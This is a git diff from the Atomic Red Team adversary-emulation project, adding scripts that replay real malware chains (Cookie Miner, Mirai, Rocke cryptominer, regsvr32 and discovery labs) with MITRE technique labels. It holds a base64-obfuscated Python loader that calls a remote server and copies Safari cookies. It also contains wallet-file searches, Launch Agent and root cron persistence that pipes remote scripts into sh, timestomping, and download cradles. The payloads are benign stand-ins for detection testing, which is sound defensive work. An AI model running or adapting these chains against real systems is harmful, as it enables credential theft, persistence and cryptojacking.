<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'));</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
@@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>ProgramArguments</key>
<array>
<string>/Users/Shared/xmrig2</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>Label</key>
<string>cookie-miner-payload-launchagent.plist</string>
</dict>
</plist>
@@ -0,0 +1,49 @@
#! /bin/bash
# Tactic: Discovery
# Technique: T1033 - System Owner/User Discovery
OUTPUT="$(id -un)"
# Tactic: Collection
# Technique: T1005 - Data from Local System
cd ~/Library/Cookies
grep -q "coinbase" "Cookies.binarycookies"
# Tactic: Collection
# Technique: T1074 - Data Staged
mkdir ${OUTPUT}
cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
# Tactic: Exfiltration
# Technique: T1002 - Data Compressed
zip -r interestingsafaricookies.zip ${OUTPUT}
# Tactic: Exfiltration
# Technique: T1048 - Exfiltration Over Alternative Protocol
# Simulate network connection for exfiltration
curl https://atomicredteam.io > /dev/null
curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
# Tactic: Discovery
# Technique: T1083 - File and Directory Discovery
find ~ -name "*wallet*" > interestingfiles.txt
cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
# Tactic: Persistence
# Technique: T1159 - Launch Agent
mkdir -p ~/Library/LaunchAgents
cd ~/Library/LaunchAgents
curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
launchctl load -w com.apple.rig2.plist
launchctl load -w com.proxy.initialize.plist
cd /Users/Shared
curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x ./xmrig2
./xmrig2
@@ -0,0 +1,25 @@
# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
# out = ps.stdout.read()
# ps.stdout.close()
# if re.search("Little Snitch", out):
# sys.exit()
# import urllib2;
# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
# req.add_header('User-Agent',UA);
# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
# proxy = urllib2.ProxyHandler();
# o = urllib2.build_opener(proxy);
# urllib2.install_opener(o);
# a=urllib2.urlopen(req).read();
# Tactic: Defense Evasion
# Technique: T1140 - Deobfuscate/Decode Files or Information
#
# Tactic: Discovery
# Technique: T1057 - Process Discovery
#
# Tactic: Command and Control
# Technique: T1043 - Commonly Used Port
#
import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'))
+17
View File
@@ -0,0 +1,17 @@
#! /bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
# Tactic: Discovery
# Technique: T1082 - System Information discovery
MIRAI_EXT=`uname -m`
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1222 - File Permissions Modification
chmod +x mirai.$MIRAI_EXT
./mirai.$MIRAI_EXT
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf mirai.$MIRAI_EXT
@@ -0,0 +1,10 @@
#! /bin/bash
# Tactic: Defense Evasion
# Technique: T1027 - Obfuscated Files or Information
bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-base64.sh)|base64 -d |/bin/bash"
# If you want to skip the base64 process, uncommend the following line:
# bash -c "(curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|/bin/bash"
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 01" >> /tmp/atomic.log
@@ -0,0 +1,81 @@
IyEgL2Jpbi9iYXNoCgpmdW5jdGlvbiBjKCkgewpwa2lsbCAtZiBzb3VycGx1bQpwa2lsbCAtZiB4
bXJpZwpwa2lsbCAtZiBjcnlwdG9uaWdodApwa2lsbCAtZiBzdHJhdHVtCnBraWxsIC1mIG1peG5l
cmR4CnBraWxsIC1mIG1pbmV4bXIKcGtpbGwgLWYgbWluZXJkCnBraWxsIC1mIG1pbmVyZ2F0ZQpw
a2lsbCAtZiBrd29ya2VyMzQKcGtpbGwgLWYgWGJhc2gKCiMgICBUYWN0aWM6IERlZmVuc2UgRXZh
c2lvbgojICAgVGVjaG5pcXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24K
Y2hhdHRyIC1pIC90bXAva3dvcmtlcmRzIC92YXIvdG1wL2t3b3JrZXJkcwoKIyAgIFRhY3RpYzog
RGVmZW5zZSBFdmFzaW9uCiMgICBUZWNobmlxdWU6IFQxMTA3IC0gRmlsZSBEZWxldGlvbgpybSAt
cmYgL3RtcC9rd29ya2VyZHMgL3Zhci90bXAva3dvcmtlcmRzCgojICAgVGFjdGljOiBEaXNjb3Zl
cnkKIyAgIFRlY2huaXF1ZTogVDEwNTcgLSBQcm9jZXNzIERpc2NvdmVyeQpwcyBhdXhmfGdyZXAg
LXYgZ3JlcHxncmVwIC12ICJcXyIgfGdyZXAgLXYgImt0aHJlYWRkIiB8Z3JlcCAiXFsuKlxdInxh
d2sgJ3twcmludCAkMn0nfHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCnBzIGF1eGZ8Z3Jl
cCAtdiBncmVwfGdyZXAgInhtcmlnIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+
L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAiWGJhc2giIHwgYXdrICd7
cHJpbnQgJDJ9J3x4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpwcyBhdXhmfGdyZXAgLXYg
Z3JlcHxncmVwICJzdHJhdHVtIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rl
di9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8Z3JlcCAieG1yIiB8IGF3ayAne3ByaW50
ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxsIDI+JjEKcHMgYXV4ZnxncmVwIC12IGdyZXB8
Z3JlcCAibWluZXJkIiB8IGF3ayAne3ByaW50ICQyfSd8eGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKCiMgICBUYWN0aWM6IERpc2NvdmVyeQojICAgVGVjaG5pcXVlOiBUMTA0OSAtIFN5c3Rl
bSBOZXR3b3JrIENvbm5lY3Rpb25zIERpc2NvdmVyeQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzMz
IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxs
IC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo0NDQ0IHxhd2sgJ3twcmlu
dCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251
bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDo1NTU1IHxhd2sgJ3twcmludCAkN30nfCBhd2sg
LUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRz
dGF0IC1hbnAgfCBncmVwIDo2NjY2IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3By
aW50ICQxfScgfCB4YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBn
cmVwIDo3Nzc3IHxhd2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4
YXJncyBraWxsIC05ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDozMzQ3IHxh
d2sgJ3twcmludCAkN30nfCBhd2sgLUYnWy9dJyAne3ByaW50ICQxfScgfCB4YXJncyBraWxsIC05
ID4vZGV2L251bGwgMj4mMQpuZXRzdGF0IC1hbnAgfCBncmVwIDoxNDQ0NCB8YXdrICd7cHJpbnQg
JDd9J3wgYXdrIC1GJ1svXScgJ3twcmludCAkMX0nIHwgeGFyZ3Mga2lsbCAtOSA+L2Rldi9udWxs
IDI+JjEKbmV0c3RhdCAtYW5wIHwgZ3JlcCA6MTQ0MzMgfGF3ayAne3ByaW50ICQ3fSd8IGF3ayAt
RidbL10nICd7cHJpbnQgJDF9JyB8IHhhcmdzIGtpbGwgLTkgPi9kZXYvbnVsbCAyPiYxCgplY2hv
ICQoZGF0ZSAtdSkgIkV4ZWN1dGVkIEF0b21pYyBSZWQgVGVhbSBSb2NrZSBhbmQgUm9sbCwgU3Rh
Z2UgMDIsIHBhcnQgQyIgPj4gL3RtcC9hdG9taWMubG9nCn0KCmZ1bmN0aW9uIGIoKSB7CiAgICBt
a2RpciAtcCAvdmFyL3RtcAoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAgIyAg
IFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCiAgICBjaG1v
ZCAxNzc3IC92YXIvdG1wCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAg
VGVjaG5pcXVlOiBUMTAzNiAtIE1hc3F1ZXJhZGluZwogICAgKGN1cmwgLWZzU0wgLS1jb25uZWN0
LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnlj
by9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvYXRvbWlj
LWhlbGxvIC1vIC92YXIvdG1wL2t3b3JrZXJkc3x8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2Vy
Y29udGVudC5jb20vcmVkY2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMv
Q2hhaW5fUmVhY3Rpb25zL2F0b21pYy1oZWxsbyAtTyAvdmFyL3RtcC9rd29ya2VyZHMpICYmIGNo
bW9kICt4IC92YXIvdG1wL2t3b3JrZXJkcwogICAgbm9odXAgL3Zhci90bXAva3dvcmtlcmRzID4v
ZGV2L251bGwgMj4mMSAmCgogICAgZWNobyAkKGRhdGUgLXUpICJFeGVjdXRlZCBBdG9taWMgUmVk
IFRlYW0gUm9ja2UgYW5kIFJvbGwsIFN0YWdlIDAyLCBwYXJ0IEIiID4+IC90bXAvYXRvbWljLmxv
Zwp9CgpmdW5jdGlvbiBhKCkgewoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lvbgogICAg
IyAgIFRlY2huaXF1ZTogVDEyMjIgLSBGaWxlIFBlcm1pc3Npb24gTW9kaWZpY2F0aW9uCgljaGF0
dHIgLWkgL2V0Yy9jcm9uLmQvcm9vdCAvdmFyL3Nwb29sL2Nyb24vcm9vdCAvdmFyL3Nwb29sL2Ny
b24vY3JvbnRhYnMvcm9vdAoKICAgICMgICBUYWN0aWM6IFBlcnNpc3RlbmNlCiAgICAjICAgVGVj
aG5pcXVlOiBUMTE2OCAtIExvY2FsIEpvYiBTY2hlZHVsaW5nCgllY2hvIC1lICIqLzEwICogKiAq
ICogcm9vdCAoY3VybCAtZnNTTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2h8fHdnZXQgLXEgLU8tIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaCl8c2hcbiMjIiA+IC9ldGMvY3Jvbi5kL3Jvb3QKCW1rZGlyIC1wIC92YXIvc3Bvb2wv
Y3Jvbi9jcm9udGFicwoJZWNobyAtZSAiKi8zMSAqICogKiAqIChjdXJsIC1mc1NMIGh0dHBzOi8v
cmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFz
dGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFjdGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVj
b2RlZC5zaHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL3Jl
ZGNhbmFyeWNvL2F0b21pYy1yZWQtdGVhbS9tYXN0ZXIvQVJUaWZhY3RzL0NoYWluX1JlYWN0aW9u
cy9yb2NrZS1hbmQtcm9sbC1zdGFnZS0wMi1kZWNvZGVkLnNoKXxzaFxuIyMiID4gL3Zhci9zcG9v
bC9jcm9uL2Nyb250YWJzL3Jvb3QKCW1rZGlyIC1wIC9ldGMvY3Jvbi5kYWlseQoJKGN1cmwgLWZz
U0wgLS1jb25uZWN0LXRpbWVvdXQgMTIwIGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNv
bS9yZWRjYW5hcnljby9hdG9taWMtcmVkLXRlYW0vbWFzdGVyL0FSVGlmYWN0cy9DaGFpbl9SZWFj
dGlvbnMvcm9ja2UtYW5kLXJvbGwtc3RhZ2UtMDItZGVjb2RlZC5zaCAtbyAvZXRjL2Nyb24uZGFp
bHkvb2FuYWNyb25lcnx8d2dldCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmVk
Y2FuYXJ5Y28vYXRvbWljLXJlZC10ZWFtL21hc3Rlci9BUlRpZmFjdHMvQ2hhaW5fUmVhY3Rpb25z
L3JvY2tlLWFuZC1yb2xsLXN0YWdlLTAyLWRlY29kZWQuc2ggLU8gL2V0Yy9jcm9uLmRhaWx5L29h
bmFjcm9uZXIpCgogICAgIyAgIFRhY3RpYzogRGVmZW5zZSBFdmFzaW9uCiAgICAjICAgVGVjaG5p
cXVlOiBUMTIyMiAtIEZpbGUgUGVybWlzc2lvbiBNb2RpZmljYXRpb24KICAgIGNobW9kIDc1NSAv
ZXRjL2Nyb24uZGFpbHkvb2FuYWNyb25lcgoKICAgICMgICBUYWN0aWM6IERlZmVuc2UgRXZhc2lv
bgogICAgIyAgIFRlY2huaXF1ZTogVDEwOTkgLSBUaW1lc3RvbXAKCXRvdWNoIC1hY21yIC9iaW4v
c2ggL2V0Yy9jcm9uLmRhaWx5L29hbmFjcm9uZXIKICAgIHRvdWNoIC1hY21yIC9iaW4vc2ggL2V0
Yy9jcm9uLmQvcm9vdAogICAgdG91Y2ggLWFjbXIgL2Jpbi9zaCAvdmFyL3Nwb29sL2Nyb24vY3Jv
bnRhYnMvcm9vdAoKICAgIGVjaG8gJChkYXRlIC11KSAiRXhlY3V0ZWQgQXRvbWljIFJlZCBUZWFt
IFJvY2tlIGFuZCBSb2xsLCBTdGFnZSAwMiwgcGFydCBBIiA+PiAvdG1wL2F0b21pYy5sb2cKfQoK
YQpiCmM=
@@ -0,0 +1,90 @@
#! /bin/bash
function c() {
pkill -f sourplum
pkill -f xmrig
pkill -f cryptonight
pkill -f stratum
pkill -f mixnerdx
pkill -f minexmr
pkill -f minerd
pkill -f minergate
pkill -f kworker34
pkill -f Xbash
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Defense Evasion
# Technique: T1107 - File Deletion
rm -rf /tmp/kworkerds /var/tmp/kworkerds
# Tactic: Discovery
# Technique: T1057 - Process Discovery
ps auxf|grep -v grep|grep -v "\_" |grep -v "kthreadd" |grep "\[.*\]"|awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmrig" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "Xbash" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "stratum" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "xmr" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
ps auxf|grep -v grep|grep "minerd" | awk '{print $2}'|xargs kill -9 >/dev/null 2>&1
# Tactic: Discovery
# Technique: T1049 - System Network Connections Discovery
netstat -anp | grep :3333 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :4444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :5555 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :6666 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :7777 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :3347 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14444 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
netstat -anp | grep :14433 |awk '{print $7}'| awk -F'[/]' '{print $1}' | xargs kill -9 >/dev/null 2>&1
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part C" >> /tmp/atomic.log
}
function b() {
mkdir -p /var/tmp
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 1777 /var/tmp
# Tactic: Defense Evasion
# Technique: T1036 - Masquerading
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -o /var/tmp/kworkerds||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello -O /var/tmp/kworkerds) && chmod +x /var/tmp/kworkerds
nohup /var/tmp/kworkerds >/dev/null 2>&1 &
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part B" >> /tmp/atomic.log
}
function a() {
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chattr -i /etc/cron.d/root /var/spool/cron/root /var/spool/cron/crontabs/root
# Tactic: Persistence
# Technique: T1168 - Local Job Scheduling
echo -e "*/10 * * * * root (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /etc/cron.d/root
mkdir -p /var/spool/cron/crontabs
echo -e "*/31 * * * * (curl -fsSL https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh||wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh)|sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.daily
(curl -fsSL --connect-timeout 120 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -o /etc/cron.daily/oanacroner||wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/rocke-and-roll-stage-02-decoded.sh -O /etc/cron.daily/oanacroner)
# Tactic: Defense Evasion
# Technique: T1222 - File Permission Modification
chmod 755 /etc/cron.daily/oanacroner
# Tactic: Defense Evasion
# Technique: T1099 - Timestomp
touch -acmr /bin/sh /etc/cron.daily/oanacroner
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
echo $(date -u) "Executed Atomic Red Team Rocke and Roll, Stage 02, part A" >> /tmp/atomic.log
}
a
b
c
+36
View File
@@ -0,0 +1,36 @@
:: Basic Test Lab One
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct
::
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: Lab Two
:: Chain Reactions - Chaining Multiple ATOMIC Test
:: Lets have some fun shall we ;-)
:: Techniques rarely occur in isolation
:: In the Attack Lets combine 3 Techniques
:: You can customize tests
:: Step 1. A payload executes Regsvr32.exe as seen in Lab One T1117
regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll
:: Step 2. This payload will execute an discovery sequence T1087
:: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
:: Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
:: Step 3. We will setup some persistence by creating a scheduled task. T1053
:: Alternate Ending : SCHTASKS /Create /SC ONCE /TN spawn /TR "regsvr32.exe /s /u /i:https://example.com/a.sct scrobj.dll" /ST 20:10
SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10
:: We will also just go ahead and clean up the task.
SCHTASKS /Delete /TN Spawn /F
@@ -8,7 +8,7 @@ net config workstation
net accounts
net accounts /domain
net view
sc.exe query
sc query
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+1
View File
@@ -0,0 +1 @@
Downloaded Remote Content
+22 -38
View File
@@ -1,58 +1,42 @@
# Contributor Code of Conduct
# Contributor Covenant Code of Conduct
Welcome to the [Atomic Red Team online community](https://atomicredteam.io/). Our goal is to foster an open, safe, and welcoming environment. As a collective, we—as contributors, maintainers, and the Open Source Projects team of Red Canary—pledge to encourage our project and community to be a harassment-free space. We invite you to collaborate, exchange thoughts or information, and engage with one another. Atomic Red Team is meant for everyone, regardless of age, personal appearance, body size, disability, nationality, race, ethnicity, gender identity and expression, level of experience or academics, religion, or sexual identity and orientation.
## Our Pledge
## Our Guidelines
In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
### Acceptable Behavior
## Our Standards
* Using welcoming and inclusive language. Some people [use different pronouns](https://www.npr.org/2021/06/02/996319297/gender-identity-pronouns-expression-guide-lgbtq)— please respect all pronouns.
Examples of behavior that contributes to creating a positive environment include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
